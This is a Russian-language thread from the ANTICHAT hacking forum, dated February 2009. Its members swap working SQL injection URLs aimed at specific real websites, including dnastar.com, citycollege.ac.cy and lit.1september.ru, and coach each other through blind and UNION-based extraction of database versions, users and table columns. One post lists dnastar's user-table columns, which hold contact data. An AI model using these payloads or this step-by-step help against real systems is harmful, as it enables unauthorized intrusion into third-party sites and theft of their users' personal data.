ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.02.2009, 19:27
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от Gorev
2 wildshaman
http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((se lect+user()),18,1))=x
я нашел слепухy
Version : 5.1.30-log
Database : dblit
User : webuser@localhost
Респект)
А как версию, юзера и Дб вытянул?
|
|
|
24.02.2009, 19:30
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули
|
|
|
|
24.02.2009, 19:33
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от Gorev
запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули
О, спс, про блинды не читал...
|
|
|
|
24.02.2009, 23:36
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://www.dnastar.com/support/FAQs1.php?faqid=-1
Не могу вытащить юзеров и пароли ихнее
а точнее вытащил из таблицы user
колонку username токо =\
дальше чет не могу так как все там перерыл
|
|
|
|
24.02.2009, 23:53
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
diznt, там при логине не пароль просят, а какой-то номер (Subscriber Number)
http://www.dnastar.com/support/FAQs1.php?faqid=-10+union+select+1,2,group_concat(column_name,0x2F, table_name),4,5,6+from+information_schema.columns+ where+column_name+like+'%num%'/*
ssnum/forms
может что-то из этого .. проверь на всякий случай.
2sabe
http://www.whimit.com/forum_read.php?f=17&id=75739+and+substring(version (),1,1)=4
версия 4.0. Подзапросов нет .. поковыряю еще насчет юниона
|
|
|
|
24.02.2009, 23:55
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
в таблице user такие колонки там
dnastar:user:LEADNUM
dnastar:user:FIRSTNAME
dnastar:user:LASTNAME
dnastar:user:INSTIT
dnastar:user:PHONE
dnastar:user:EMAIL
dnastar:user:NO_WEB_PRC
dnastar:user:EXEMPT
dnastar:user:datelogged
dnastar:user:username
dnastar:user:sp
dnastar:user:web_role
|
|
|
|
25.02.2009, 00:03
|
|
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296
Репутация:
74
|
|
http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,2,3/* вроде инъекция... Но не выводит. Прошу помочь.
|
|
|
|
25.02.2009, 00:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.citycollege.ac.cy/link.php?id=-1+union+select+222,version(),1/*
|
|
|
|
25.02.2009, 00:09
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,concat_ws(0x3a,user(),version() ,database()),user()--
|
|
|
|
25.02.2009, 19:28
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
http://amxbans.snakearena.net/ban_details.php?bid=-1+union+select+1,2,3,4,5,6
вроде как инъекция, но ничего не выводит...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [JavaScript]](/avatars/avatar76873.jpg?1135515){kind=avatar}
Похожие темы
Линейный вид
